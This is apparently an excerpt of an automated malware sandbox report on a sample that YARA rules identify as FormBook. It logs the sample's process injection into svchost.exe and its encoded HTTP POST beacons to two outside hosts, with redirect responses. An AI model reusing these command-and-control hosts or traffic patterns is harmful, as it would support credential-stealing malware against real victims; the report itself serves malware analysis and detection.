                                                      Data Ascii: **********************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_m
                                                      Nov 25, 2024 13:55:39.996490002 CET1236INData Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 30 3b
                                                      Data Ascii: **************************************************************/.b-text{padding:0;color:#364364;font:15px/24px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin:0 0 24px}.b-text.b-text_margin_top{margin-top:24px}.b-text_size_gian
                                                      Nov 25, 2024 13:55:39.996516943 CET1236INData Raw: 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 36 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6c 61 72
                                                      Data Ascii: l,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.b-text_size_large-compact.b-text_margin_top,.b-text_size_large.b-text_margin_top{margin-top:36px}.b-text_size_large-compact{font:24px/30px Inter,Arial,Helvetica Neue,Helvetica,
                                                      Nov 25, 2024 13:55:39.996536016 CET448INData Raw: 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 38 70 78 7d 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 6e 6f 6e 65 7b 6d 61 72 67 69 6e 3a 30 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65
                                                      Data Ascii: s,sans-serif;margin-bottom:18px}.b-text_margin_none{margin:0}html:not(.is_adaptive) .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_gian
                                                      Nov 25, 2024 13:55:39.996778965 CET1236INData Raw: 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 34 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64
                                                      Data Ascii: al,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_huge\@desktop{font:48px/60px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}html:not(.is_adaptive) .b-text_size
                                                      Nov 25, 2024 13:55:40.116753101 CET1236INData Raw: 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 36 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 5c 40
                                                      Data Ascii: ext_margin_top{margin-top:36px}html:not(.is_adaptive) .b-text_size_large-compact\@desktop{font:24px/30px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}html:not(.is_adaptive) .b-text_size_medium\@desktop{font:20px/


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.54987713.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:46.428128958 CET682OUTPOST /4mbo/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.aktmarket.xyz
                                                      Origin: http://www.aktmarket.xyz
                                                      Referer: http://www.aktmarket.xyz/4mbo/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 209
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2f 4d 66 73 6f 48 61 41 4a 56 35 5a 6e 71 65 4b 37 63 73 6d 43 6f 39 6a 76 42 35 32 55 77 2f 79 6c 55 37 58 7a 51 6b 77 31 30 6d 35 50 6e 6a 48 52 71 2b 72 37 4d 55 55 66 41 65 75 4b 66 4e 64 53 36 36 6b 42 61 45 4d 58 70 32 65 4b 41 6e 5a 78 58 7a 76 41 4f 43 64 78 6b 57 6c 37 77 43 49 6e 36 4d 2f 73 4d 35 47 36 6f 74 64 36 53 67 78 59 49 49 6e 63 7a 66 4b 4a 6f 33 6d 30 46 62 49 48 61 62 57 56 34 35 35 79 63 39 79 43 78 58 78 61 49 6d 6d 46 74 58 2f 78 49 35 35 65 34 6d 65 4f 62 45 43 59 35 6b 6d 67 47 64 37 67 76 6b 57 4e 46 46 6e 57 4b 35 62 37 53 59 3d
                                                      Data Ascii: Zvupu44p=eYA6veuLKw+2/MfsoHaAJV5ZnqeK7csmCo9jvB52Uw/ylU7XzQkw10m5PnjHRq+r7MUUfAeuKfNdS66kBaEMXp2eKAnZxXzvAOCdxkWl7wCIn6M/sM5G6otd6SgxYIInczfKJo3m0FbIHabWV455yc9yCxXxaImmFtX/xI55e4meObECY5kmgGd7gvkWNFFnWK5b7SY=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.54988313.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:49.098848104 CET702OUTPOST /4mbo/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.aktmarket.xyz
                                                      Origin: http://www.aktmarket.xyz
                                                      Referer: http://www.aktmarket.xyz/4mbo/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 229
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2b 73 50 73 72 6b 69 41 65 6c 35 59 69 71 65 4b 78 38 73 63 43 6f 35 6a 76 41 38 37 55 43 62 79 69 31 4c 58 79 55 77 77 30 30 6d 35 46 48 6a 4f 4d 36 2f 6c 37 4d 51 63 66 45 43 75 4b 65 70 64 53 2f 65 6b 43 70 38 50 58 35 32 63 47 67 6e 62 31 58 7a 76 41 4f 43 64 78 6b 53 62 37 77 71 49 6e 70 6b 2f 71 70 5a 46 33 49 74 65 35 53 67 78 63 49 49 6a 63 7a 66 34 4a 71 44 59 30 48 54 49 48 61 4c 57 56 4e 56 2b 34 63 39 6f 66 42 57 2b 65 4b 6d 6a 4e 4d 7a 6b 75 37 45 6c 49 75 32 59 47 4e 31 6f 43 62 73 4f 7a 6d 78 44 77 38 73 68 63 31 6b 4f 4d 70 70 72 6c 46 50 4c 6a 48 33 30 79 6d 57 4d 43 4f 43 39 34 58 4d 72 65 53 4a 6b
                                                      Data Ascii: Zvupu44p=eYA6veuLKw+2+sPsrkiAel5YiqeKx8scCo5jvA87UCbyi1LXyUww00m5FHjOM6/l7MQcfECuKepdS/ekCp8PX52cGgnb1XzvAOCdxkSb7wqInpk/qpZF3Ite5SgxcIIjczf4JqDY0HTIHaLWVNV+4c9ofBW+eKmjNMzku7ElIu2YGN1oCbsOzmxDw8shc1kOMpprlFPLjH30ymWMCOC94XMreSJk


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.54989213.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:51.769927979 CET1719OUTPOST /4mbo/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.aktmarket.xyz
                                                      Origin: http://www.aktmarket.xyz
                                                      Referer: http://www.aktmarket.xyz/4mbo/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 1245
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2b 73 50 73 72 6b 69 41 65 6c 35 59 69 71 65 4b 78 38 73 63 43 6f 35 6a 76 41 38 37 55 43 54 79 6c 47 44 58 7a 31 77 77 33 30 6d 35 62 58 6a 44 4d 36 2f 6f 37 49 38 59 66 45 4f 51 4b 63 68 64 53 5a 53 6b 48 59 38 50 43 4a 32 63 63 41 6e 65 78 58 7a 32 41 4f 53 52 78 6b 43 62 37 77 71 49 6e 73 67 2f 74 38 35 46 78 49 74 64 36 53 67 39 59 49 49 48 63 33 7a 6f 4a 70 76 49 33 33 7a 49 48 37 37 57 47 4c 42 2b 30 63 39 75 65 42 58 68 65 4b 72 7a 4e 4d 2f 67 75 36 67 50 49 70 61 59 56 37 30 70 59 59 38 7a 68 47 35 47 2b 50 30 47 4f 53 73 4a 4d 6f 46 4d 76 55 6e 35 6e 30 72 48 6b 32 69 51 44 71 66 69 74 42 30 74 57 48 30 4a 58 39 4e 55 55 70 4e 73 45 32 54 41 6a 62 38 70 4c 4d 32 5a 32 42 77 6f 71 55 39 63 41 6c 61 65 69 68 57 79 61 69 44 44 41 30 53 70 74 69 6c 49 78 4a 78 4d 4b 4a 64 63 67 53 55 49 68 49 69 56 54 31 79 43 4c 6c 6e 37 56 77 51 48 33 53 79 6e 37 78 69 73 6c 69 34 71 66 63 66 45 78 68 64 39 59 42 30 73 47 6d 70 67 68 50 73 56 32 [TRUNCATED]
                                                      Data Ascii: Zvupu44p=eYA6veuLKw+2+sPsrkiAel5YiqeKx8scCo5jvA87UCTylGDXz1ww30m5bXjDM6/o7I8YfEOQKchdSZSkHY8PCJ2ccAnexXz2AOSRxkCb7wqInsg/t85FxItd6Sg9YIIHc3zoJpvI33zIH77WGLB+0c9ueBXheKrzNM/gu6gPIpaYV70pYY8zhG5G+P0GOSsJMoFMvUn5n0rHk2iQDqfitB0tWH0JX9NUUpNsE2TAjb8pLM2Z2BwoqU9cAlaeihWyaiDDA0SptilIxJxMKJdcgSUIhIiVT1yCLln7VwQH3Syn7xisli4qfcfExhd9YB0sGmpghPsV2WwEbz9tq58cr2YJ6xYNaVNwo2xURSI7VTP6pwVJBBIkcGMVBQA0uupoV/XzZQtfWZquuc3CSYP/YrcZeYDKr0Dp89YeZE9IXLXIIBdGXyGcPWe8jNJXC4Vjpxk144elE/ywJXBEbe7I77k1toR3kLhdXwOmqrQz4Rq9jZSbQUN6YyRFfhEzgY/UyoBPE5oJ7Iuv88iKUEcnPhCGxsIQkw92Z39XJSYhZbHaf7GcJRuGhJJojub1JH6vQ12mrn+9PccbqMidSwxMVnXPbqrOPKFEZ/OWrOJTt4MhidWzfHd+J3CR1U+xhFPNbhyGCCQiwbTpJiTtOn15suffMQ39cNzfXsFQPkmf6ZWfA9rYKv9hBuuj6emzmCL9CAc8M/SdqxKnL8HJbkx8LTNnyJiTIPiFNynTsfqmK870owaGbJ+FAeO7j1Fuh3vh0SLVBHXt1VqxF0SQGX8tn73aF830zZbXq79bMGw80IqQUU3KxEP958V1HAkoAkiW+FiOn5uoTBPQlpPxciUzb2XcOmt8U9/Bhf+eFsp1PJpfFWScopaN58MhCNlvRjd4Eo6bG3jgl+XQuWcfTa+f2vbKeAnkwOSOFa1SezVe51tWkHGooMybfVi+yJoB8rE154tHKkdh0j8ubVE1SObXgR/kUMeQoSDIbNTlfkPYVBq [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.54990013.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:54.440800905 CET425OUTGET /4mbo/?RhqLA=IdOhgVq&Zvupu44p=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e8GQOUHjh0/XAeWf+xbcrSf/780Hk7JHgoJ90GAMQodVPQ== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.aktmarket.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Nov 25, 2024 13:55:55.660753965 CET410INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Mon, 25 Nov 2024 12:55:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 270
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 68 71 4c 41 3d 49 64 4f 68 67 56 71 26 5a 76 75 70 75 34 34 70 3d 54 61 6f 61 73 70 53 75 58 43 57 47 2b 4a 36 51 75 32 65 6b 4b 31 77 72 6a 59 32 72 2f 73 38 6e 47 4f 31 45 76 30 42 36 51 77 57 6d 36 33 2f 4a 73 33 56 30 37 48 32 55 62 48 72 47 4a 4e 48 75 6a 4a 49 33 48 68 4b 67 52 63 68 79 64 34 62 65 46 35 51 2f 65 38 47 51 4f 55 48 6a 68 30 2f 58 41 65 57 66 2b 78 62 63 72 53 66 2f 37 38 30 48 6b 37 4a 48 67 6f 4a 39 30 47 41 4d 51 6f 64 56 50 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RhqLA=IdOhgVq&Zvupu44p=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e8GQOUHjh0/XAeWf+xbcrSf/780Hk7JHgoJ90GAMQodVPQ=="}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.54991613.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:56:01.200220108 CET676OUTPOST /5cnx/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.a1shop.shop
                                                      Origin: http://www.a1shop.shop
                                                      Referer: http://www.a1shop.shop/5cnx/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 209
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 42 47 55 6c 52 51 37 2f 6b 36 34 54 6a 72 72 46 41 68 4d 6f 38 64 72 66 52 36 63 65 33 67 4e 6d 41 45 62 30 70 31 2f 74 4b 38 6c 30 34 36 56 33 7a 62 5a 66 49 6b 66 36 4e 67 73 36 2b 43 6a 38 72 43 7a 4d 36 65 6b 74 36 68 4a 72 64 41 77 62 4b 39 55 30 58 67 56 73 57 2f 46 6c 73 36 47 54 58 73 57 6e 6e 62 71 4a 2b 45 46 75 6a 36 4f 46 7a 58 76 6a 42 42 34 6c 48 67 47 72 71 44 78 2b 50 59 42 51 4f 31 2b 59 6e 63 39 65 75 34 46 77 6d 6f 51 70 42 55 58 55 33 39 4e 4e 48 33 55 77 69 4a 37 75 39 64 6b 6f 57 54 71 53 47 73 77 6b 66 68 4c 49 75 74 38 4d 37 69 45 3d
                                                      Data Ascii: Zvupu44p=lWypXHj99WLEBGUlRQ7/k64TjrrFAhMo8drfR6ce3gNmAEb0p1/tK8l046V3zbZfIkf6Ngs6+Cj8rCzM6ekt6hJrdAwbK9U0XgVsW/Fls6GTXsWnnbqJ+EFuj6OFzXvjBB4lHgGrqDx+PYBQO1+Ync9eu4FwmoQpBUXU39NNH3UwiJ7u9dkoWTqSGswkfhLIut8M7iE=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.54992213.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:56:03.862838030 CET696OUTPOST /5cnx/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.a1shop.shop
                                                      Origin: http://www.a1shop.shop
                                                      Referer: http://www.a1shop.shop/5cnx/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 229
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 41 6c 4d 6c 58 7a 44 2f 31 4b 34 53 74 4c 72 46 4b 42 4d 6b 38 64 6e 66 52 37 59 30 33 79 35 6d 41 6c 72 30 75 30 2f 74 4a 38 6c 30 7a 61 56 2b 2b 37 5a 59 49 6b 6a 49 4e 67 41 36 2b 44 48 38 72 48 50 4d 36 75 59 75 36 78 4a 70 47 51 77 64 48 64 55 30 58 67 56 73 57 2f 35 50 73 36 65 54 58 38 6d 6e 6b 35 53 4f 2f 45 46 74 33 71 4f 46 33 58 75 6b 42 42 35 43 48 69 6a 4d 71 41 4a 2b 50 64 39 51 58 48 57 62 6f 63 39 59 68 59 45 73 69 34 4e 65 4f 53 48 66 30 50 4a 46 63 6b 55 56 6a 2f 4b 45 6e 2f 73 41 46 7a 47 71 57 2f 34 54 4f 52 71 68 30 4f 73 38 6c 31 52 6b 6f 4f 62 33 54 50 44 38 4c 39 4f 6b 72 57 41 4f 31 30 2f 6c
                                                      Data Ascii: Zvupu44p=lWypXHj99WLEAlMlXzD/1K4StLrFKBMk8dnfR7Y03y5mAlr0u0/tJ8l0zaV++7ZYIkjINgA6+DH8rHPM6uYu6xJpGQwdHdU0XgVsW/5Ps6eTX8mnk5SO/EFt3qOF3XukBB5CHijMqAJ+Pd9QXHWboc9YhYEsi4NeOSHf0PJFckUVj/KEn/sAFzGqW/4TORqh0Os8l1RkoOb3TPD8L9OkrWAO10/l


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.54992813.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:56:06.536776066 CET1713OUTPOST /5cnx/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.a1shop.shop
                                                      Origin: http://www.a1shop.shop
                                                      Referer: http://www.a1shop.shop/5cnx/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 1245
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 41 6c 4d 6c 58 7a 44 2f 31 4b 34 53 74 4c 72 46 4b 42 4d 6b 38 64 6e 66 52 37 59 30 33 79 68 6d 41 58 6a 30 75 54 4c 74 49 38 6c 30 77 61 56 7a 2b 37 59 45 49 6b 4b 44 4e 67 38 4d 2b 42 50 38 74 6c 33 4d 34 63 38 75 6a 42 4a 70 5a 41 77 63 4b 39 55 6c 58 67 46 53 57 2b 56 50 73 36 65 54 58 2b 2b 6e 7a 37 71 4f 39 45 46 75 6a 36 4f 7a 7a 58 75 41 42 41 52 34 48 69 32 37 72 77 70 2b 42 5a 68 51 56 55 2b 62 6c 63 39 61 74 34 45 6b 69 34 42 42 4f 57 66 39 30 4f 38 65 63 6b 73 56 68 70 6a 2b 32 4d 74 61 57 67 47 70 51 59 42 71 54 45 69 77 78 49 51 52 35 55 31 4a 6c 4d 43 61 65 2f 6e 52 65 66 76 54 39 33 46 56 7a 69 65 45 57 6a 32 79 4a 62 34 67 4c 66 59 59 79 74 53 69 78 30 42 77 32 41 52 62 72 75 2b 46 6f 56 54 4d 42 71 6b 4e 50 62 37 31 49 73 52 43 36 73 46 54 46 77 75 39 7a 57 79 4a 71 64 52 35 51 73 67 79 72 36 35 37 68 4f 61 6f 4c 43 67 30 70 57 64 6c 4a 76 46 77 32 30 31 73 43 67 39 32 30 75 5a 69 73 78 55 73 55 52 6c 37 76 4e 37 6d 44 [TRUNCATED]
                                                      Data Ascii: Zvupu44p=lWypXHj99WLEAlMlXzD/1K4StLrFKBMk8dnfR7Y03yhmAXj0uTLtI8l0waVz+7YEIkKDNg8M+BP8tl3M4c8ujBJpZAwcK9UlXgFSW+VPs6eTX++nz7qO9EFuj6OzzXuABAR4Hi27rwp+BZhQVU+blc9at4Eki4BBOWf90O8ecksVhpj+2MtaWgGpQYBqTEiwxIQR5U1JlMCae/nRefvT93FVzieEWj2yJb4gLfYYytSix0Bw2ARbru+FoVTMBqkNPb71IsRC6sFTFwu9zWyJqdR5Qsgyr657hOaoLCg0pWdlJvFw201sCg920uZisxUsURl7vN7mDU2cAZYmIAAvsVLqtAFLjv+3s9dFx6D1EiadO4nzxMRDb8S0oXYgYbvI08wtOW9ZawP76rwocjRuScLlS4w8sHqoOO/L/k7/tul+M6ZB1Z6bUJMIZGFuDuJhM7c2HL2QaIv2sTRxyCEGc/GqPFNSFC+NuXneZLIWCbNzzPIsx+615+R/S5i4asuky0y/GgrAydudC1mTqLfJVl0KUJ0J1anoX+LVR2RrGZMAfej99+6q1hGEVYUxEFC54he0TcfhVJlGcklC8cVUo9rvySSkSMp3LmI3fFmSnT1FM6h/yt7z9BcuZC4tdNPs7omOWhRXSJWSA41xEFTMOs3phrmszCZJ59EfYXS8MSLB/SluWfdXlVLUF6IEc7hBKSpZybh5ZYREZyreN3/gutdzg5uxvuZVjAw7Tcq+1DViJywl2YAaL5Qmu+7AVwOkQuvHIZwUzkfoFOAxM/p1GbYjWnGXzjcrxGWYVm0Tx9VBe1X+dp8tQjkGlVmZcJXvSWmbXahzMZCCSSbXPRDqCTyAB0bUaKnQtJtd3VIkmc3ncyHgbso5Blu2sWsUnfwjDwBD9drwYkfJxeX0+ewkVvJttneuWqk9X6hMiO+G6Ybb9gmh3bD6/+9fAYYugrVUA9QJ3X1YIzEOyjami3Pngq0SME2DFGg8+3ttM+hVBTG [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.54993413.248.169.48801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:56:09.250834942 CET423OUTGET /5cnx/?Zvupu44p=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+EUlRRQZaMEAQAdSQfgWtonXK7S514myqW5G+fyl7DTuYQ==&RhqLA=IdOhgVq HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.a1shop.shop
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Nov 25, 2024 13:56:10.385618925 CET410INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Mon, 25 Nov 2024 12:56:10 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 270
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 76 75 70 75 34 34 70 3d 6f 55 61 4a 55 78 33 57 39 31 58 4b 47 46 77 6b 62 69 44 59 67 59 70 6c 67 34 54 5a 42 51 77 62 67 74 43 6b 58 76 67 6f 6e 6a 45 38 53 48 76 78 2b 55 33 54 4e 73 74 51 6e 4c 56 4a 38 59 39 46 46 57 58 7a 61 6b 41 66 77 53 7a 2f 75 31 4b 79 33 63 67 36 2b 45 55 6c 52 52 51 5a 61 4d 45 41 51 41 64 53 51 66 67 57 74 6f 6e 58 4b 37 53 35 31 34 6d 79 71 57 35 47 2b 66 79 6c 37 44 54 75 59 51 3d 3d 26 52 68 71 4c 41 3d 49 64 4f 68 67 56 71 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Zvupu44p=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+EUlRRQZaMEAQAdSQfgWtonXK7S514myqW5G+fyl7DTuYQ==&RhqLA=IdOhgVq"}</script></head></html>


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:07:54:11
                                                      Start date:25/11/2024
                                                      Path:C:\Users\user\Desktop\Fi#U015f.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Fi#U015f.exe"
                                                      Imagebase:0xe40000
                                                      File size:1'209'344 bytes
                                                      MD5 hash:DD2D2996EE3044CA1CA5F90C91F2F77C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:07:54:13
                                                      Start date:25/11/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Fi#U015f.exe"
                                                      Imagebase:0xc0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2552287327.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2552706561.0000000003400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
